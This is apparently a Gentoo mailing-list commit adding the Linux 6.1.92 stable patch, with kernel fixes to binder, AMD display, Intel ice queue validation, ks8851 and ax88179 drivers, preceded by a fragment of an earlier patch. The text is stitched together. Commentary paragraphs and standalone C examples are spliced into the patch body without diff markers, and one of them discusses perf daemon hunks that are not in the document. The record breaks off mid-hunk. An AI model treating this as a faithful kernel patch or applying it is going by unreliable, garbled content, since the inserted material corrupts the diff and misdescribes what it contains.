+diff --git a/tools/testing/selftests/net/forwarding/bridge_mld.sh b/tools/testing/selftests/net/forwarding/bridge_mld.sh
+index e2b9ff773c6b6..f84ab2e657547 100755
+--- a/tools/testing/selftests/net/forwarding/bridge_mld.sh
++++ b/tools/testing/selftests/net/forwarding/bridge_mld.sh
+@@ -478,10 +478,10 @@ mldv2exc_timeout_test()
+ 	RET=0
+ 	local X=("2001:db8:1::20" "2001:db8:1::30")
+ 
+-	# GMI should be 3 seconds
++	# GMI should be 5 seconds
+ 	ip link set dev br0 type bridge mcast_query_interval 100 \
+ 					mcast_query_response_interval 100 \
+-					mcast_membership_interval 300
++					mcast_membership_interval 500
+ 
+ 	mldv2exclude_prepare $h1
+ 	ip link set dev br0 type bridge mcast_query_interval 500 \
+@@ -489,7 +489,7 @@ mldv2exc_timeout_test()
+ 					mcast_membership_interval 1500
+ 
+ 	$MZ $h1 -c 1 $MZPKT_ALLOW2 -q
+-	sleep 3
++	sleep 5
+ 	bridge -j -d -s mdb show dev br0 \
+ 		| jq -e ".[].mdb[] | \
+ 			 select(.grp == \"$TEST_GROUP\" and \
+diff --git a/tools/testing/selftests/resctrl/Makefile b/tools/testing/selftests/resctrl/Makefile
+index 2deac2031de9e..021863f86053a 100644
+--- a/tools/testing/selftests/resctrl/Makefile
++++ b/tools/testing/selftests/resctrl/Makefile
+@@ -5,6 +5,8 @@ CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := resctrl_tests
+ 
++LOCAL_HDRS += $(wildcard *.h)
++
+ include ../lib.mk
+ 
+-$(OUTPUT)/resctrl_tests: $(wildcard *.[ch])
++$(OUTPUT)/resctrl_tests: $(wildcard *.c)
+diff --git a/tools/testing/selftests/syscall_user_dispatch/sud_test.c b/tools/testing/selftests/syscall_user_dispatch/sud_test.c
+index b5d592d4099e8..d975a67673299 100644
+--- a/tools/testing/selftests/syscall_user_dispatch/sud_test.c
++++ b/tools/testing/selftests/syscall_user_dispatch/sud_test.c
+@@ -158,6 +158,20 @@ static void handle_sigsys(int sig, siginfo_t *info, void *ucontext)
+ 
+ 	/* In preparation for sigreturn. */
+ 	SYSCALL_DISPATCH_OFF(glob_sel);
++
++	/*
++	 * The tests for argument handling assume that `syscall(x) == x`. This
++	 * is a NOP on x86 because the syscall number is passed in %rax, which
++	 * happens to also be the function ABI return register.  Other
++	 * architectures may need to swizzle the arguments around.
++	 */
++#if defined(__riscv)
++/* REG_A7 is not defined in libc headers */
++# define REG_A7 (REG_A0 + 7)
++
++	((ucontext_t *)ucontext)->uc_mcontext.__gregs[REG_A0] =
++			((ucontext_t *)ucontext)->uc_mcontext.__gregs[REG_A7];
++#endif
+ }
+ 
+ TEST(dispatch_and_return)
+diff --git a/tools/tracing/latency/latency-collector.c b/tools/tracing/latency/latency-collector.c
+index 59a7f2346eab4..f7ed8084e16ad 100644
+--- a/tools/tracing/latency/latency-collector.c
++++ b/tools/tracing/latency/latency-collector.c
+@@ -935,12 +935,12 @@ static void show_available(void)
+ 	}
+ 
+ 	if (!tracers) {
+-		warnx(no_tracer_msg);
++		warnx("%s", no_tracer_msg);
+ 		return;
+ 	}
+ 
+ 	if (!found) {
+-		warnx(no_latency_tr_msg);
++		warnx("%s", no_latency_tr_msg);
+ 		tracefs_list_free(tracers);
+ 		return;
+ 	}
+@@ -983,7 +983,7 @@ static const char *find_default_tracer(void)
+ 	for (i = 0; relevant_tracers[i]; i++) {
+ 		valid = tracer_valid(relevant_tracers[i], &notracer);
+ 		if (notracer)
+-			errx(EXIT_FAILURE, no_tracer_msg);
++			errx(EXIT_FAILURE, "%s", no_tracer_msg);
+ 		if (valid)
+ 			return relevant_tracers[i];
+ 	}
+@@ -1878,7 +1878,7 @@ static void scan_arguments(int argc, char *argv[])
+ 			}
+ 			valid = tracer_valid(current_tracer, &notracer);
+ 			if (notracer)
+-				errx(EXIT_FAILURE, no_tracer_msg);
++				errx(EXIT_FAILURE, "%s", no_tracer_msg);
+ 			if (!valid)
+ 				errx(EXIT_FAILURE,
+ "The tracer %s is not supported by your kernel!\n", current_tracer);


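A pattern worth calling out from the perf daemon hunks above: open(2) returns a
non-negative file descriptor on success and -1 on failure, never 0, so a test of
the form "if (!fd)" silently misses every real error while rejecting descriptor
0, which is perfectly valid. A minimal stand-alone sketch of the corrected idiom
(illustrative only; the "/tmp/example-control" path is made up for this example
and does not come from the patch):

	#include <fcntl.h>
	#include <stdio.h>
	#include <unistd.h>

	int main(void)
	{
		/* open(2) yields fd >= 0 on success and -1 on error, so the
		 * failure check must be "fd < 0", not "!fd" (fd 0 is a valid
		 * descriptor, usually stdin). */
		int fd = open("/tmp/example-control", O_WRONLY | O_NONBLOCK);
		if (fd < 0) {
			perror("open");
			return 1;
		}
		close(fd);
		return 0;
	}

The same class of fix appears twice in the builtin-daemon.c hunk above, once for
the session control file and once for the ack file.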
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-05-25 15:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-05-25 15:16 UTC (permalink / raw
  To: gentoo-commits

commit:     174de16ebc3197a705f61aa2262db6be4f421fd8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat May 25 15:16:20 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat May 25 15:16:20 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=174de16e

Linux patch 6.1.92

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1091_linux-6.1.92.patch | 2589 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2593 insertions(+)

diff --git a/0000_README b/0000_README
index b8e8658e..0d537557 100644
--- a/0000_README
+++ b/0000_README
@@ -407,6 +407,10 @@ Patch:  1090_linux-6.1.91.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.91
 
+Patch:  1091_linux-6.1.92.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.92
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1091_linux-6.1.92.patch b/1091_linux-6.1.92.patch
new file mode 100644
index 00000000..fc3ed66e
--- /dev/null
+++ b/1091_linux-6.1.92.patch
@@ -0,0 +1,2589 @@
+diff --git a/Documentation/admin-guide/hw-vuln/core-scheduling.rst b/Documentation/admin-guide/hw-vuln/core-scheduling.rst
+index cf1eeefdfc32f..a92e10ec402e7 100644
+--- a/Documentation/admin-guide/hw-vuln/core-scheduling.rst
++++ b/Documentation/admin-guide/hw-vuln/core-scheduling.rst
+@@ -67,8 +67,8 @@ arg4:
+     will be performed for all tasks in the task group of ``pid``.
+ 
+ arg5:
+-    userspace pointer to an unsigned long for storing the cookie returned by
+-    ``PR_SCHED_CORE_GET`` command. Should be 0 for all other commands.
++    userspace pointer to an unsigned long long for storing the cookie returned
++    by ``PR_SCHED_CORE_GET`` command. Should be 0 for all other commands.
+ 
+ In order for a process to push a cookie to, or pull a cookie from a process, it
+ is required to have the ptrace access mode: `PTRACE_MODE_READ_REALCREDS` to the
+diff --git a/Documentation/sphinx/kernel_include.py b/Documentation/sphinx/kernel_include.py
+index abe7680883771..6387624423363 100755
+--- a/Documentation/sphinx/kernel_include.py
++++ b/Documentation/sphinx/kernel_include.py
+@@ -97,7 +97,6 @@ class KernelInclude(Include):
+         # HINT: this is the only line I had to change / commented out:
+         #path = utils.relative_path(None, path)
+ 
+-        path = nodes.reprunicode(path)
+         encoding = self.options.get(
+             'encoding', self.state.document.settings.input_encoding)
+         e_handler=self.state.document.settings.input_encoding_error_handler
+diff --git a/Makefile b/Makefile
+index a7d90996e4125..0be668057cb2a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 91
++SUBLEVEL = 92
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index c15f71501c6c2..044b98a62f7bb 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -1752,7 +1752,6 @@ config ARM64_LSE_ATOMICS
+ 
+ config ARM64_USE_LSE_ATOMICS
+ 	bool "Atomic instructions"
+-	depends on JUMP_LABEL
+ 	default y
+ 	help
+ 	  As part of the Large System Extensions, ARMv8.1 introduces new
+diff --git a/arch/arm64/include/asm/lse.h b/arch/arm64/include/asm/lse.h
+index c503db8e73b01..f99d74826a7ef 100644
+--- a/arch/arm64/include/asm/lse.h
++++ b/arch/arm64/include/asm/lse.h
+@@ -10,7 +10,6 @@
+ 
+ #include <linux/compiler_types.h>
+ #include <linux/export.h>
+-#include <linux/jump_label.h>
+ #include <linux/stringify.h>
+ #include <asm/alternative.h>
+ #include <asm/alternative-macros.h>
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index 8c2b7c074eca1..46111f8c12e61 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -5350,7 +5350,7 @@ static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
+ 			goto err;
+ 		break;
+ 	case BINDER_SET_MAX_THREADS: {
+-		int max_threads;
++		u32 max_threads;
+ 
+ 		if (copy_from_user(&max_threads, ubuf,
+ 				   sizeof(max_threads))) {
+diff --git a/drivers/android/binder_internal.h b/drivers/android/binder_internal.h
+index abe19d88c6ecc..c2c1bb3c1e60b 100644
+--- a/drivers/android/binder_internal.h
++++ b/drivers/android/binder_internal.h
+@@ -420,7 +420,7 @@ struct binder_proc {
+ 	struct list_head todo;
+ 	struct binder_stats stats;
+ 	struct list_head delivered_death;
+-	int max_threads;
++	u32 max_threads;
+ 	int requested_threads;
+ 	int requested_threads_started;
+ 	int tmp_ref;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+index 9fe2eae88ec17..ee83d282b49a8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+@@ -974,6 +974,9 @@ int amdgpu_ras_query_error_status(struct amdgpu_device *adev,
+ 	if (!obj)
+ 		return -EINVAL;
+ 
++	if (!info || info->head.block == AMDGPU_RAS_BLOCK_COUNT)
++		return -EINVAL;
++
+ 	if (info->head.block == AMDGPU_RAS_BLOCK__UMC) {
+ 		amdgpu_ras_get_ecc_info(adev, &err_data);
+ 	} else {
+diff --git a/drivers/gpu/drm/amd/display/dc/dsc/dc_dsc.c b/drivers/gpu/drm/amd/display/dc/dsc/dc_dsc.c
+index d52cbc0e9b679..5f57bdd597c27 100644
+--- a/drivers/gpu/drm/amd/display/dc/dsc/dc_dsc.c
++++ b/drivers/gpu/drm/amd/display/dc/dsc/dc_dsc.c
+@@ -924,7 +924,12 @@ static bool setup_dsc_config(
+ 	if (!is_dsc_possible)
+ 		goto done;
+ 
+-	dsc_cfg->num_slices_v = pic_height/slice_height;
++	if (slice_height > 0) {
++		dsc_cfg->num_slices_v = pic_height / slice_height;
++	} else {
++		is_dsc_possible = false;
++		goto done;
++	}
+ 
+ 	if (target_bandwidth_kbps > 0) {
+ 		is_dsc_possible = decide_dsc_target_bpp_x16(
+diff --git a/drivers/mfd/stpmic1.c b/drivers/mfd/stpmic1.c
+index eb3da558c3fbd..ee0469d5d4354 100644
+--- a/drivers/mfd/stpmic1.c
++++ b/drivers/mfd/stpmic1.c
+@@ -108,8 +108,9 @@ static const struct regmap_irq stpmic1_irqs[] = {
+ static const struct regmap_irq_chip stpmic1_regmap_irq_chip = {
+ 	.name = "pmic_irq",
+ 	.status_base = INT_PENDING_R1,
+-	.mask_base = INT_CLEAR_MASK_R1,
+-	.unmask_base = INT_SET_MASK_R1,
++	.mask_base = INT_SET_MASK_R1,
++	.unmask_base = INT_CLEAR_MASK_R1,
++	.mask_unmask_non_inverted = true,
+ 	.ack_base = INT_CLEAR_R1,
+ 	.num_regs = STPMIC1_PMIC_NUM_IRQ_REGS,
+ 	.irqs = stpmic1_irqs,
+diff --git a/drivers/mmc/core/mmc.c b/drivers/mmc/core/mmc.c
+index 3a927452a6501..7e39017e440fb 100644
+--- a/drivers/mmc/core/mmc.c
++++ b/drivers/mmc/core/mmc.c
+@@ -1819,8 +1819,13 @@ static int mmc_init_card(struct mmc_host *host, u32 ocr,
+ 
+ 		if (err)
+ 			goto free_card;
+-
+-	} else if (!mmc_card_hs400es(card)) {
++	} else if (mmc_card_hs400es(card)) {
++		if (host->ops->execute_hs400_tuning) {
++			err = host->ops->execute_hs400_tuning(host, card);
++			if (err)
++				goto free_card;
++		}
++	} else {
+ 		/* Select the desired bus width optionally */
+ 		err = mmc_select_bus_width(card);
+ 		if (err > 0 && mmc_card_hs(card)) {
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index e64bef490a174..42d8e5e771b7e 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -544,17 +544,15 @@ bool ice_vc_isvalid_vsi_id(struct ice_vf *vf, u16 vsi_id)
+ 
+ /**
+  * ice_vc_isvalid_q_id
+- * @vf: pointer to the VF info
+- * @vsi_id: VSI ID
++ * @vsi: VSI to check queue ID against
+  * @qid: VSI relative queue ID
+  *
+  * check for the valid queue ID
+  */
+-static bool ice_vc_isvalid_q_id(struct ice_vf *vf, u16 vsi_id, u8 qid)
++static bool ice_vc_isvalid_q_id(struct ice_vsi *vsi, u8 qid)
+ {
+-	struct ice_vsi *vsi = ice_find_vsi(vf->pf, vsi_id);
+ 	/* allocated Tx and Rx queues should be always equal for VF VSI */
+-	return (vsi && (qid < vsi->alloc_txq));
++	return qid < vsi->alloc_txq;
+ }
+ 
+ /**
+@@ -1254,7 +1252,7 @@ static int ice_vc_ena_qs_msg(struct ice_vf *vf, u8 *msg)
+ 	 */
+ 	q_map = vqs->rx_queues;
+ 	for_each_set_bit(vf_q_id, &q_map, ICE_MAX_RSS_QS_PER_VF) {
+-		if (!ice_vc_isvalid_q_id(vf, vqs->vsi_id, vf_q_id)) {
++		if (!ice_vc_isvalid_q_id(vsi, vf_q_id)) {
+ 			v_ret = VIRTCHNL_STATUS_ERR_PARAM;
+ 			goto error_param;
+ 		}
+@@ -1276,7 +1274,7 @@ static int ice_vc_ena_qs_msg(struct ice_vf *vf, u8 *msg)
+ 
+ 	q_map = vqs->tx_queues;
+ 	for_each_set_bit(vf_q_id, &q_map, ICE_MAX_RSS_QS_PER_VF) {
+-		if (!ice_vc_isvalid_q_id(vf, vqs->vsi_id, vf_q_id)) {
++		if (!ice_vc_isvalid_q_id(vsi, vf_q_id)) {
+ 			v_ret = VIRTCHNL_STATUS_ERR_PARAM;
+ 			goto error_param;
+ 		}
+@@ -1381,7 +1379,7 @@ static int ice_vc_dis_qs_msg(struct ice_vf *vf, u8 *msg)
+ 		q_map = vqs->tx_queues;
+ 
+ 		for_each_set_bit(vf_q_id, &q_map, ICE_MAX_RSS_QS_PER_VF) {
+-			if (!ice_vc_isvalid_q_id(vf, vqs->vsi_id, vf_q_id)) {
++			if (!ice_vc_isvalid_q_id(vsi, vf_q_id)) {
+ 				v_ret = VIRTCHNL_STATUS_ERR_PARAM;
+ 				goto error_param;
+ 			}
+@@ -1407,7 +1405,7 @@ static int ice_vc_dis_qs_msg(struct ice_vf *vf, u8 *msg)
+ 		bitmap_zero(vf->rxq_ena, ICE_MAX_RSS_QS_PER_VF);
+ 	} else if (q_map) {
+ 		for_each_set_bit(vf_q_id, &q_map, ICE_MAX_RSS_QS_PER_VF) {
+-			if (!ice_vc_isvalid_q_id(vf, vqs->vsi_id, vf_q_id)) {
++			if (!ice_vc_isvalid_q_id(vsi, vf_q_id)) {
+ 				v_ret = VIRTCHNL_STATUS_ERR_PARAM;
+ 				goto error_param;
+ 			}
+@@ -1463,7 +1461,7 @@ ice_cfg_interrupt(struct ice_vf *vf, struct ice_vsi *vsi, u16 vector_id,
+ 	for_each_set_bit(vsi_q_id_idx, &qmap, ICE_MAX_RSS_QS_PER_VF) {
+ 		vsi_q_id = vsi_q_id_idx;
+ 
+-		if (!ice_vc_isvalid_q_id(vf, vsi->vsi_num, vsi_q_id))
++		if (!ice_vc_isvalid_q_id(vsi, vsi_q_id))
+ 			return VIRTCHNL_STATUS_ERR_PARAM;
+ 
+ 		q_vector->num_ring_rx++;
+@@ -1477,7 +1475,7 @@ ice_cfg_interrupt(struct ice_vf *vf, struct ice_vsi *vsi, u16 vector_id,
+ 	for_each_set_bit(vsi_q_id_idx, &qmap, ICE_MAX_RSS_QS_PER_VF) {
+ 		vsi_q_id = vsi_q_id_idx;
+ 
+-		if (!ice_vc_isvalid_q_id(vf, vsi->vsi_num, vsi_q_id))
++		if (!ice_vc_isvalid_q_id(vsi, vsi_q_id))
+ 			return VIRTCHNL_STATUS_ERR_PARAM;
+ 
+ 		q_vector->num_ring_tx++;
+@@ -1611,7 +1609,7 @@ static int ice_vc_cfg_qs_msg(struct ice_vf *vf, u8 *msg)
+ 		    qpi->txq.headwb_enabled ||
+ 		    !ice_vc_isvalid_ring_len(qpi->txq.ring_len) ||
+ 		    !ice_vc_isvalid_ring_len(qpi->rxq.ring_len) ||
+-		    !ice_vc_isvalid_q_id(vf, qci->vsi_id, qpi->txq.queue_id)) {
++		    !ice_vc_isvalid_q_id(vsi, qpi->txq.queue_id)) {
+ 			goto error_param;
+ 		}
+ 
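
The ice_virtchnl.c changes above stop re-looking-up the VSI on every queue-ID check: callers resolve the VSI once and pass the pointer, and the validator only compares against the allocated queue count. A standalone sketch of the refactored check (hypothetical types standing in for the driver's):

#include <stdbool.h>
#include <stdio.h>

struct vsi {
	unsigned int alloc_txq;	/* Tx and Rx queue counts are kept equal */
};

/* After the refactor: the caller has already resolved the VSI. */
static bool is_valid_qid(const struct vsi *vsi, unsigned int qid)
{
	return qid < vsi->alloc_txq;
}

int main(void)
{
	struct vsi vsi = { .alloc_txq = 4 };
	unsigned long q_map = 0x13;	/* queues 0, 1 and 4 requested */

	for (unsigned int qid = 0; qid < 16; qid++) {
		if (!(q_map & (1UL << qid)))
			continue;
		printf("queue %u: %s\n", qid,
		       is_valid_qid(&vsi, qid) ? "ok" : "rejected");
	}
	return 0;
}
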
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index 7f72604079723..fb8e856933097 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -107,9 +107,6 @@ ice_vc_fdir_param_check(struct ice_vf *vf, u16 vsi_id)
+ 	if (!(vf->driver_caps & VIRTCHNL_VF_OFFLOAD_FDIR_PF))
+ 		return -EINVAL;
+ 
+-	if (vsi_id != vf->lan_vsi_num)
+-		return -EINVAL;
+-
+ 	if (!ice_vc_isvalid_vsi_id(vf, vsi_id))
+ 		return -EINVAL;
+ 
+diff --git a/drivers/net/ethernet/micrel/ks8851_common.c b/drivers/net/ethernet/micrel/ks8851_common.c
+index 502518cdb4618..6453c92f0fa7c 100644
+--- a/drivers/net/ethernet/micrel/ks8851_common.c
++++ b/drivers/net/ethernet/micrel/ks8851_common.c
+@@ -328,7 +328,6 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ {
+ 	struct ks8851_net *ks = _ks;
+ 	struct sk_buff_head rxq;
+-	unsigned handled = 0;
+ 	unsigned long flags;
+ 	unsigned int status;
+ 	struct sk_buff *skb;
+@@ -336,24 +335,17 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 	ks8851_lock(ks, &flags);
+ 
+ 	status = ks8851_rdreg16(ks, KS_ISR);
++	ks8851_wrreg16(ks, KS_ISR, status);
+ 
+ 	netif_dbg(ks, intr, ks->netdev,
+ 		  "%s: status 0x%04x\n", __func__, status);
+ 
+-	if (status & IRQ_LCI)
+-		handled |= IRQ_LCI;
+-
+ 	if (status & IRQ_LDI) {
+ 		u16 pmecr = ks8851_rdreg16(ks, KS_PMECR);
+ 		pmecr &= ~PMECR_WKEVT_MASK;
+ 		ks8851_wrreg16(ks, KS_PMECR, pmecr | PMECR_WKEVT_LINK);
+-
+-		handled |= IRQ_LDI;
+ 	}
+ 
+-	if (status & IRQ_RXPSI)
+-		handled |= IRQ_RXPSI;
+-
+ 	if (status & IRQ_TXI) {
+ 		unsigned short tx_space = ks8851_rdreg16(ks, KS_TXMIR);
+ 
+@@ -365,20 +357,12 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 		if (netif_queue_stopped(ks->netdev))
+ 			netif_wake_queue(ks->netdev);
+ 		spin_unlock(&ks->statelock);
+-
+-		handled |= IRQ_TXI;
+ 	}
+ 
+-	if (status & IRQ_RXI)
+-		handled |= IRQ_RXI;
+-
+ 	if (status & IRQ_SPIBEI) {
+ 		netdev_err(ks->netdev, "%s: spi bus error\n", __func__);
+-		handled |= IRQ_SPIBEI;
+ 	}
+ 
+-	ks8851_wrreg16(ks, KS_ISR, handled);
+-
+ 	if (status & IRQ_RXI) {
+ 		/* the datasheet says to disable the rx interrupt during
+ 		 * packet read-out, however we're masking the interrupt
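
The ks8851 hunk above acknowledges the complete interrupt status word immediately after reading it, instead of accumulating a "handled" mask and acknowledging only those bits at the end - a pattern that can leave unhandled causes latched forever. A standalone sketch of the ack-everything-up-front strategy (hypothetical register model, not the real chip interface):

#include <stdio.h>

#define IRQ_LCI  0x0001
#define IRQ_TXI  0x0002
#define IRQ_RXI  0x0004

/* Hypothetical latched interrupt-status register. */
static unsigned int isr_reg = IRQ_LCI | IRQ_TXI | IRQ_RXI;

static unsigned int read_isr(void)
{
	return isr_reg;
}

/* Writing a bit back clears (acks) that cause. */
static void write_isr(unsigned int bits)
{
	isr_reg &= ~bits;
}

static void irq_handler(void)
{
	unsigned int status = read_isr();

	/* Ack everything we saw up front, as the patched handler does. */
	write_isr(status);

	if (status & IRQ_TXI)
		printf("tx done\n");
	if (status & IRQ_RXI)
		printf("rx pending\n");
	/* IRQ_LCI needs no work here, yet it was still acked above. */
}

int main(void)
{
	irq_handler();
	printf("isr after handler: 0x%04x\n", isr_reg);
	return 0;
}
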
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 21b6c4d94a632..6d31061818e93 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -174,6 +174,7 @@ struct ax88179_data {
+ 	u32 wol_supported;
+ 	u32 wolopts;
+ 	u8 disconnecting;
++	u8 initialized;
+ };
+ 
+ struct ax88179_int_data {
+@@ -1673,6 +1674,18 @@ static int ax88179_reset(struct usbnet *dev)
+ 	return 0;
+ }
+ 
++static int ax88179_net_reset(struct usbnet *dev)
++{
++	struct ax88179_data *ax179_data = dev->driver_priv;
++
++	if (ax179_data->initialized)
++		ax88179_reset(dev);
++	else
++		ax179_data->initialized = 1;
++
++	return 0;
++}
++
+ static int ax88179_stop(struct usbnet *dev)
+ {
+ 	u16 tmp16;
+@@ -1692,6 +1705,7 @@ static const struct driver_info ax88179_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1704,6 +1718,7 @@ static const struct driver_info ax88178a_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1716,7 +1731,7 @@ static const struct driver_info cypress_GX3_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1729,7 +1744,7 @@ static const struct driver_info dlink_dub1312_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1742,7 +1757,7 @@ static const struct driver_info sitecom_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1755,7 +1770,7 @@ static const struct driver_info samsung_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1768,7 +1783,7 @@ static const struct driver_info lenovo_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1781,7 +1796,7 @@ static const struct driver_info belkin_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset	= ax88179_reset,
++	.reset	= ax88179_net_reset,
+ 	.stop	= ax88179_stop,
+ 	.flags	= FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1794,7 +1809,7 @@ static const struct driver_info toshiba_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset	= ax88179_reset,
++	.reset	= ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags	= FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1807,7 +1822,7 @@ static const struct driver_info mct_info = {
+ 	.unbind	= ax88179_unbind,
+ 	.status	= ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset	= ax88179_reset,
++	.reset	= ax88179_net_reset,
+ 	.stop	= ax88179_stop,
+ 	.flags	= FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1820,7 +1835,7 @@ static const struct driver_info at_umc2000_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset  = ax88179_reset,
++	.reset  = ax88179_net_reset,
+ 	.stop   = ax88179_stop,
+ 	.flags  = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1833,7 +1848,7 @@ static const struct driver_info at_umc200_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset  = ax88179_reset,
++	.reset  = ax88179_net_reset,
+ 	.stop   = ax88179_stop,
+ 	.flags  = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1846,7 +1861,7 @@ static const struct driver_info at_umc2000sp_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset  = ax88179_reset,
++	.reset  = ax88179_net_reset,
+ 	.stop   = ax88179_stop,
+ 	.flags  = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
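
The ax88179 hunks above route every .reset callback through a wrapper that skips the first (bind-time) invocation and only performs the full chip reset on later calls, e.g. on resume. A standalone sketch of that run-once gating (hypothetical structure in place of the usbnet private data):

#include <stdio.h>

struct dev_priv {
	unsigned char initialized;
};

static int chip_reset(struct dev_priv *priv)
{
	(void)priv;
	printf("full chip reset performed\n");
	return 0;
}

/* First call (during bind) is a no-op; later calls really reset. */
static int net_reset(struct dev_priv *priv)
{
	if (priv->initialized)
		return chip_reset(priv);

	priv->initialized = 1;
	return 0;
}

int main(void)
{
	struct dev_priv priv = { 0 };

	net_reset(&priv);	/* bind: skipped */
	net_reset(&priv);	/* resume: resets */
	return 0;
}
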
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index 1ef36a0a7dd20..223482584f54f 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -205,6 +205,7 @@ static int pinctrl_register_one_pin(struct pinctrl_dev *pctldev,
+ 				    const struct pinctrl_pin_desc *pin)
+ {
+ 	struct pin_desc *pindesc;
++	int error;
+ 
+ 	pindesc = pin_desc_get(pctldev, pin->number);
+ 	if (pindesc) {
